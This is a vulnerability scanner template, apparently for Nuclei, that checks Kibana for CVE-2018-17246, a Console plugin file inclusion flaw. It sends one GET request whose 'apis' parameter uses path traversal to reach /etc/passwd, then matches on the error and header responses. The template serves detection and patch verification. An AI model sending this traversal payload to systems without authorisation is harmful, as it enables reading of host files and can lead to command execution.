id: CVE-2018-17246 info: name: Kibana - Local File Inclusion author: princechaddha,thelicato severity: critical description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. remediation: | Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md - https://www.elastic.co/community/security - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594 - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 - https://access.redhat.com/errata/RHBA-2018:3743 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17246 cwe-id: CWE-829,CWE-73 epss-score: 0.96913 epss-percentile: 0.99623 cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elastic product: "kibana" tags: cve,cve2018,lfi,kibana,vulhub http: - method: GET path: - "{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: word part: body words: - "\"message\":\"An internal server error occurred\"" - type: word part: header words: - "kbn-name" - "kibana" case-insensitive: true condition: or - type: word part: header words: - "application/json" # digest: 4b0a00483046022100c7dd17a3bee5049a54230e2afd49bab5cf981e8207c22f13cc24692f909f8023022100870277a3596e45923aba1d06cb564be4a3999bb0404a1c93d45b70b232ae6766:922c64590222798bb761d5b6d8e72950